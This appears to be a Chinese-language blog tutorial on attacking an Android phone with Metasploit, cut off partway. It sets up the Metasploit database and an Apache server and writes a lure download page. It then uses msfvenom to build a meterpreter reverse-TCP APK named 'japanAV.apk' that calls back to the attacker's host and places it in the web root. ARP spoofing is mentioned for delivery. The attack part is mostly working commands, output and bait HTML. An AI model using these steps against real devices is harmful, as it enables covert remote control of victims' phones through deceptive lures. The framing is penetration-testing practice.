虽然开通csdn已经有一段时间了,可是一直由于各方面原因没有使用过csdn,在开始学东西之前,大牛们一直说要写一些东西来记录,一直深以为然,所以准备坚持这个好习惯,来一个好的开始,接触metasploit这个工具有一段时间了,虽然不能灵活运用,但进行一些基础的渗透和攻击测试还是比较轻松的,一直在kali上使用metasploit,因为kali集成了很多工具,使用起来比较方便,本人也偏爱 kali,在windows上也试验了metasploit,但是由于环境不够完善,进行一次完整的渗透测试比较困难,在windows上我使用的是pentestbox这个软件,这是windows上的渗透测试神器,它集成了很多诸如sqlmap,ettercap,burp还有metasploit等工具,感兴趣的可以看看这个[pentestbox链接](http://www.freebuf.com/sectool/120877.html),下面我们开始
1.环境准备:
攻击者(windows或linux下有渗透测试环境的主机,包括nmap,metasploit,ettercap,apache服务器)ip:192.168.1.106
2.渗透测试攻击者主机环境搭建:
root@KALI:/# service postgresql start
root@KALI:/# msfconsole
msf > db_status
[*] postgresql connected to msf4
在这一步先开启postgresql的数据库,然后进入msf,其中db_status用来检查数据库连接状态,如果数据库没有创建或自动连接,比如下面所示
msf > db_status
[*] postgresql selected, no connection
可以在msf外面新建一个数据库,我这里就是自己新建的数据库msf4,具体操作流程如下:
首先退出msf,进入数据库:
~# su postgres
创建新的用户并指定密码:
$ createuser msf4 -P
然后输入两次密码即可
创建数据库并指定数据库所有者为msf4,数据库名称也为msf4
$ createdb --owner=msf4 msf4
退出数据库并重启postgresql
service postgresql restart
然后进入msf进行连接:
msf > db_connect msf4:msf4@localhost/msf4
[*] Rebuilding the module cache in the background...
msf > db_status
[*] postgresql connected to msf5
稍等片刻正在后台重建数据库,然后就可以使用了
然后开启kali的apache2服务器,用于arp欺骗后的恶意文件传输
root@KALI:~# /etc/init.d/apache2 start
[ ok ] Starting apache2 (via systemctl): apache2.service.
然后配置apache2服务器的主页,kaliRolling版本的在目录:
/var/www/html/index.html
配置一个可以下载文件html网页,实例如下:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html">
<TITLE>Page de test de l'installation d'Apache</TITLE>
</HEAD>
<!-- Background white, links blue (unvisited), navy (visited), red
(active) -->
<BODY
BGCOLOR="#FFFFFF"
TEXT="#000000"
LINK="#0000FF"
VLINK="#000080"
ALINK="#FF0000"
>
<a><strong>This is a very beautiful apk,look look!!!<br></br></strong></a>
<img src=http://192.168.1.106/timg.jpg height="500" width="330">
<a href="http://192.168.1.106/text.apk"><strong><br></br>[Download]</strong></a>
</BODY>
</HTML>
将制作好的文件放在同一目录下,并修改文件中的相应位置即可,这里是http://192.168.1.106/timg.jpg
和http://192.168.1.106/text.apk 图片自己去下载一个放上去,用来吸引视线。
3.android手机的metasploit渗透攻击:
攻击目标android手机ip:192.168.1.115
本次渗透攻击我们使用payload里面的reverse_tcp进行攻击测试
首先在主机上利用msfvenom的功能生成恶意apk文件:
root@KALI:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=5555 R > /root/japanAV.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8845 bytes
可以使用msfvenom -h 查看使用方法,这里-P是指定利用模块,后面LHOST和LPORT配置参数,指定到我本机的5555端口
然后将生成的apk文件放到上述index.html的地址,并修改html文件中的apk名称:
root@KALI:~# cp /root/japanAV.apk /var/www/html/
root@KALI<